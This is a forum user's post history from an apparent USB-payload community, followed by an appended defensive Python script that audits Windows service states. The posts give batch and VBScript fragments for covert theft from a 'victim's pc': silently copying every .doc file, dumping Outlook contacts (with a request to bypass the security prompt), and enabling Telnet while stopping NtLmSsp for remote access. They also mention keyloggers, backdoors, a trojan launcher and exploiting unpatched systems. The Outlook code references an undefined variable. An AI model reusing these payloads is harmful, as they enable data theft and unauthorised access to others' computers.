DMilton

Active Members
  • Posts: 132
Everything posted by DMilton

  1. Maybe this was a foolish question? Has no one tried it? Any other way to extract the contents of the contacts lists to a file? Any suggestion?
  2. We have to appoint DingleBerries the official digger!
  3. I think the project must be continued, and if alexthedrifter carries the torch I'll be glad to help a bit with cleaning code, digging for some other interesting things and with other community contributions or ideas. But it must be in another post, and I have a further question: is anybody else interested in working on it?
  4. Hahahahaha! In your case, the answer of the topic would be: How many icons can room you?
  5. I agree that in forensic works, the last thing you want to see is nothing, there's no sense in hiding the cmd box. This payload was made by Tcstool originally in forensic works, I agree it can be used for other purposes such as grabbing sensitive info from a pc, but... I saw the white paper and the info looks great! You can extract not only the serial number of all attached USB, but the last date it was connected and more... For forensic matters I think it is a great implementation. If you want some help with this, I'll be ready to try to do my best with it.
  6. I think we can improve the payload a bit more... But I'll wait a little longer for Leapo to take the torch. These days are complicated for someone who is studying... If he passes the torch, I'll be very glad to continue it with some of the community support. If he doesn't, I'll be very glad to help in the progress and improvement of it. In both cases, this project will continue....
  7. I can't believe it! There's about 2 tons and a half of icons on my 3 desktops, most of them are simply txt files with very long names... It's time to clean it a bit, if you want to help me, no worry...
  8. You can learn and read by typing (for example) BINDER JOINER HACK into google. As far as I know, you can do something like this but it results in executing an exe and launching a jpg instead of the reverse. But if the program you want to call is a virus or if it's virus detectable, it'll be detected anyway.
  9. Switchblade Wiki works for me! Try again...
  10. Wow!! I get mine 8Gb per 16€ at Media Market!
  11. All U3 drives work for U3 Hacking, Sandisk, Memorex, etc... :EDIT I found my new U3 Sandisk 8Gb a week ago but It took some searching work... Ebay is a good option for it.
  12. You can enable the Windows Scripting Host too by executing the noscript.exe. But there's one thing I don't understand... The WSH doesn't affect the running of batches
  13. :P You don't need to define the variables twice, if you CALL ANOTHERBATCH.BAT from yourbatch.bat, the variables given by the vbs will work perfectly. It's because when you're calling a batch program from another, all the defined variables exist. But if you definitely don't want to use a vbs launcher to give the variables to the batch, you can apply the batching way I showed you to format the date and time.
  14. You must have a proof system with all available updates installed. Then see the differences between your updates and the updates extracted from the victim's pc, then you can exploit the non-installed patches as alexthedrifter says... googling.
  15. You can use the same vbs with each batch file you need to. There are two ways to do it, one is by executing one instance of the vbs per file... See

          strPath = "YOURBATCH.BAT"
          objShell.Run strPath, 1, False

      The run command doesn't control the results of the running app, in this case, YOURBATCH.BAT. But if you are attempting to run more batches at a time, you can add each batch from the same script and control their execution by managing the boolean value of the run method: with "True" the program will wait until the batch finishes, and with "False" it doesn't wait for the batch to finish, so the program will continue with the next line of code. Example:

          Prog1 = "YOURBATCH.BAT" 'This is in the same folder as the vbs
          Prog2 = "C:\Windows\hiddenbatch.bat" 'For a batch in other folder
          Prog3 = "%SYSTEMROOT%\SYSTEM32\my_personal_trojan.exe" 'Using environment variables
          objShell.Run Prog1, 1, False ' The batch "yourbatch.bat" is executed in a minimized way and the program doesn't wait
          objShell.Run Prog2, 1, True ' The batch "hiddenbatch.bat" is executed and the program waits for it to finish
          objShell.Run Prog3, 1, False

      In all of yourbatch.bat, hiddenbatch.bat or my_personal_trojan.exe, the Date and Time variables can be called from the batch. If you want to know more on this stuff, see Microsoft Windows 2000 Scripting Guide. For the subject of this post, see This <_< But if you want, you can format dates in a batch way... If you use in your batch something like this with a date formatted as DD/MM/YYYY:

          set DateToFile=%date:~6,4%-%date:~3,2%-%date:~0,2%
          \stext %computername%[%DateToFile%].txt

      As you see, you can use the %DateToFile% variable in your program, it will give the date formatted as YYYY-MM-DD... Now you can play with it to do the same with the %TIME% system environment variable or simply use SET /? from the command line to see examples on how to use variables and how to define them. ;)
  16. It's not a new or brilliant idea, but I've been working a bit in extracting the contacts list from outlook address book. This implementation made simply to any payload, would be able to extract the contact list to a plain text file.

          Set fso = CreateObject("Scripting.FileSystemObject")
          set outlook=WScript.CreateObject("Outlook.Application")
          if Not err=0 then
            msgbox "Outlook is not available."
          else
            set mapi=outlook.GetNameSpace("MAPI")
            set MSOfile=fso.CreateTextFile("outlook-contacts.txt")
            for ctrentries=1 to mapi.AddressLists.Count
              set a=mapi.AddressLists(ctrentries)
              x=1
              for countEntries=1 to n.AddressEntries.Count
                contact=n.AddressEntries(x)
                MSOfile.WriteLine contact
                x=x+1
              next
            next
          end if

      Of course, the err check is only for testing purposes. ;) The problem is the message box of (almost for Outlook 2003) asking for permission for reading the contents of the pst file. Any ideas on how to bypass the message box, some fix to the code or idea?
  17. See for the code in line 1 of the vbs:

          Set objShell = CreateObject("Wscript.Shell"

      must be (also edited in previous post):

          Set objShell = CreateObject("Wscript.Shell")

      I have tested it and works ok (almost in WXP). If you get the variables, you can do whatever you want with them, calling them, batching them, etc. A proof of concept on how it works (maybe for your mkdir it can be useful), I have batched the next. Called yourbatch.bat (place it in the same folder as vbs), execute the vbs and it will call the yourbatch.bat file that will create a plain txt containing the results of vars given. Also it creates a new folder with the mentioned structure.

          ::yourbatch.bat
          echo off
          echo PROOF OF CONCEPT >proofdatetime.txt
          echo var Date: %Date% >>proofdatetime.txt
          echo var Time: %Time% >>proofdatetime.txt
          echo mkdirectory: %computername%[%Date%-%Time%].txt>>pruebadate.txt
          mkdir %computername%[%Date%-%Time%]

      You can do what you want with the variables. But I think the problem was solved with the mentioned code change.
  18. Pocket knife extracts a list of updates of the system, you can test them at home and search for any vulnerability.
  19. I think it's a good idea too. Do you know why it hangs up? On what kind of systems does it hang up? If you want us to have a look at the piece of the VBScript, there'll be a good way to debug it by posting it or PM it, as you like.
  20. There's no mistake. It's a piece from pocketknife and the only thing you have to do is define the path you want to copy the files to. Previous to creating the path %computername%\Slurp_Data\Desktop, you must create the ..\..\Documents folder, the \logfiles folder, the %computername% folder, the Slurp_Data folder... Use one mkdir for each folder...

          mkdir ..\..\Documents
          mkdir ..\..\Documents\logfiles
          mkdir ..\..\Documents\logfiles\%computername%
          mkdir ..\..\Documents\logfiles\%computername%\Slurp_Data
          mkdir ..\..\Documents\logfiles\%computername%\Slurp_Data\Desktop
          xcopy "C:\*.doc" "..\..\Documents\logfiles\%computername%\Slurp_Data\Desktop\" /s /c /q /r /h /y
  21. You can search for specific types of files. The task is undetectable and you can find the solution reading the forum... Not only able to do it in one/two directories... You can search the entire hdd. nircmd is not needed (also you can use it), you can program it to make the work invisible, it doesn't depend on what white/grey/black hat you do, but the way you program it and use it.
  22. It depends on what you want to do with your payload... Amish and switchblade are both in Leapo's pocketknife. The best you can do is read all the posts (pinned and newest) and look for the features you want. Or better, you can modify the batches to do what you want. Reading is the better solution. There's a lot of payloads you can execute from a non-U3.
  23. As ever, I must say it... If you use an alternative installation language, you will get an error when trying to get "%ALLUSERSPROFILE%\Start Menu". But if you answer the registry key for it into HKEY_CLASSES_ROOT\CLSID\{4622AD11-FF23-11d0-8D34-00A0C90F2719} key value, you will find the exact and correct name of the "Start Menu" folder. For example, as all of you know, I'm Spanish and if I try to go to "%ALLUSERSPROFILE%\Start Menu" surely I can't because my Start Menu is named "Menú Inicio"... It's possible to get in a variable the key of the Start Menú by using a variation of the reliable paths method described by me in the wiki... Or simply using vbs, of course! Take a look if you want!
  24. Then I will be testing the reason of not running almost it is in a desktop folder. The code seems to be ok, but... Hummm....

      :Edit Issues with Telnet: By the way, there are some problems with the Telnet Service. The TlntSvr doesn't start with

          sc config TlntSvr start= boot

      but with

          sc config TlntSvr start= auto

      On the other hand, Telnet Service is disabled with XP SP2 and we can launch it but it is not available in XP Home. Then we must check what OS we have to do the task or create the entire service to use correctly (can do it by vbs). Another thing to check to ensure the service starts is that TlntSvr is installed in the machine. For doing so, we can check for the correct branch in reg (HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TlntSvr) and operate accordingly with adding the service or not. It will only take a few lines to check it and if it is not installed, we can easily add the needed keys to the registry with the batch or the vbs to operate the Service correctly. Before enabling the Telnet Service, I think it is a better option to stop the NtLmSsp Service (NT LM Security Support Provider) before enabling telnet.

          net stop NtLmSsp

      The final code would be...

          tlntsvr /service
          net stop NtLmSsp
          sc config TlntSvr start= auto

      But definitively, Telnet has problems in Windows XPSP2... What about using nc?
  25. I feel you didn't understand me (sorry, probably it's my poor English). The question was if the payload.exe is a compilation of all the needed files (including keylogger and backdoor) or if payload.exe needs the batches, the 1.vbs and the other exes to go?
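
A host-audit check for the service state that the Telnet post (item 24) describes, added here as an example and not part of the original posts. It parses the text printed by `sc qc` and `sc query`; the sample output and the function names are constructed for illustration.

```python
import re

# Constructed sample of `sc qc TlntSvr` followed by `sc query NtLmSsp`
# (written for this example, not captured from a real host).
SAMPLE = r"""
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: TlntSvr
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\WINDOWS\system32\tlntsvr.exe

SERVICE_NAME: NtLmSsp
        TYPE               : 20  WIN32_SHARE_PROCESS
        STATE              : 1  STOPPED
"""

def parse_services(text):
    """Return {service_name_lowercase: {FIELD: SYMBOLIC_VALUE}} from sc output."""
    services, current = {}, None
    for line in text.splitlines():
        m = re.match(r"\s*SERVICE_NAME:\s*(\S+)", line)
        if m:
            current = services.setdefault(m.group(1).lower(), {})
            continue
        # Only "FIELD : <number> <SYMBOL>" lines carry a state we care about.
        m = re.match(r"\s*([A-Z_]+)\s*:\s*\d+\s+([A-Z_]+)", line)
        if m and current is not None:
            current[m.group(1)] = m.group(2)
    return services

def audit(text):
    """List the service states that the commands in the post would leave behind."""
    svc = parse_services(text)
    findings = []
    telnet = svc.get("tlntsvr", {})
    if telnet.get("START_TYPE") in ("AUTO_START", "BOOT_START"):
        findings.append("TlntSvr starts automatically (%s)" % telnet["START_TYPE"])
    if telnet.get("STATE") == "RUNNING":
        findings.append("TlntSvr is running")
    if svc.get("ntlmssp", {}).get("STATE") == "STOPPED":
        findings.append("NtLmSsp is stopped")
    return findings

if __name__ == "__main__":
    for finding in audit(SAMPLE):
        print("FLAG:", finding)
```
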